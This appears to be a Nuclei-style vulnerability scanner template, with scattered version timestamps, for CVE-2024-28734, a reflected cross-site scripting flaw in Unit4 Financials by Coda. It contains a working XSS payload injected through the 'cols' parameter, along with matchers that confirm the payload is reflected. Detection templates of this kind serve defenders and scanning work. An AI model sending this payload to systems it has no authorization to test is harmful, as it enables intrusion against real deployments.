2024-03-23 16:48:48 +00:00
id : CVE-2024-28734
2024-03-27 01:22:14 +00:00
2024-03-23 16:48:48 +00:00
info :
2024-03-27 01:22:14 +00:00
name : Coda v.2024Q1 - Cross-Site Scripting
2024-03-23 16:48:48 +00:00
author : Kazgangap
severity : medium
2024-03-27 01:22:14 +00:00
description : |
Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.
2024-03-23 16:48:48 +00:00
reference :
- https://packetstormsecurity.com/files/177619/Financials-By-Coda-Cross-Site-Scripting.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28734
2024-03-27 01:22:14 +00:00
- http://financials.com
- http://unit4.com
classification :
epss-score : 0.00045
epss-percentile : 0.12994
2024-03-23 16:48:48 +00:00
metadata :
2024-03-27 01:22:14 +00:00
max-request : 1
2024-04-08 11:34:33 +00:00
tags : cve,cve2024,coda,xss
2024-03-23 16:48:48 +00:00
http :
2024-03-27 01:22:14 +00:00
- raw :
- |
2024-04-06 12:07:36 +00:00
GET /coda/frameset?cols="><frame%20src="javascript:alert(document.domain)"> HTTP/1.1
2024-03-27 01:22:14 +00:00
Host : {{Hostname}}
2024-03-23 16:48:48 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2024-04-06 12:03:46 +00:00
- '<frameset cols=""><frame src="javascript:alert(document.domain)">'
2024-03-23 16:48:48 +00:00
2024-04-06 12:07:36 +00:00
- type : word
part : header
words :
- 'text/html'
2024-03-23 16:48:48 +00:00
- type : status
status :
- 200
2024-04-06 12:14:34 +00:00
# digest: 490a004630440220639152ac7101721af13e0f678be3f3ff7cf9b440afa2e13e5691cc2c62e3ccdf02207da7b95d3c2610f4b7d80e42eb444efd95d5f30f992d0335dfac80d9f72719c3:922c64590222798bb761d5b6d8e72950